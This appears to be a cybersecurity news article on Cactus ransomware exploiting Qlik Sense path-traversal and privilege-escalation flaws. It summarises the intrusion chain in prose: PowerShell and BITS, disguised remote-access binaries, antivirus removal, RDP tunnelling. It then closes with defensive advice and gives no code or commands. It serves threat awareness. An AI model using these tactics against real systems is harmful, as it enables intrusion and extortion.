Cactus Ransomware Exploits Qlik Sense Vulnerabilities for Intrusion

Cactus ransomware has honed in on critical weaknesses within Qlik Sense, a data analytics solution, exploiting these vulnerabilities to breach corporate networks effectively. Qlik Sense, renowned for its capacity to interactively visualize data and generate custom reports from various data sources, has faced security challenges that Cactus ransomware has aggressively targeted.

In a recent development, Qlik Sense, available for local and cloud-based usage, faced significant security vulnerabilities in its Windows version. These vulnerabilities, disclosed late August, comprised two critical flaws. CVE-2023-41266, a path traversal bug, facilitated anonymous session generation and unauthorized HTTP requests, while CVE-2023-41265, with a severity rating of 9.8, allowed unauthenticated users to elevate privileges and execute HTTP requests on the backend server without authentication.

Despite the vendor’s release of security updates, subsequent discovery revealed the inadequacy of the fix for CVE-2023-41265, leading to the identification of a new vulnerability, CVE-2023-48365.

Cybersecurity firm has sounded the alarm, reporting active exploitation of these vulnerabilities by Cactus ransomware across unpatched, publicly-exposed Qlik Sense instances. Their observations reveal the ransomware’s strategy of initiating new processes through the exploitation of Qlik Sense Scheduler services using PowerShell and BITS.

To establish persistence and remote access, the attackers employ tools like ManageEngine UEMS executables camouflaged as Qlik files, official AnyDesk downloads, and a disguised Plink binary. Furthermore, they execute discovery commands, redirecting outputs into .TTF files via path traversal, ostensibly to obtain command outputs.

The attackers’ tactics extend to evading detection by uninstalling antivirus, changing administrator passwords, and creating RDP tunnels through the Plink command-line connection tool. The final stages involve deploying the Cactus ransomware onto compromised systems.

These techniques align with earlier observed Cactus ransomware attacks, which emerged in March, leveraging double-extortion tactics by stealing and encrypting victim data on compromised systems. Previous attacks exploited VPN vulnerabilities to gain initial access. Additionally, researchers highlighted the ransomware’s use of encryption to evade security products.

Preventing Cactus ransomware attacks involves diligently applying patches and update the software. Regularly monitoring and auditing network activities can aid in the early detection of potential vulnerabilities and suspicious activities. Implementing strong access controls, network segmentation, and regular backups of critical data stored offline are vital to mitigate the impact of potential attacks. Additionally, deploying robust endpoint security solutions and educating employees on recognizing and reporting suspicious activities can fortify defenses against ransomware intrusions.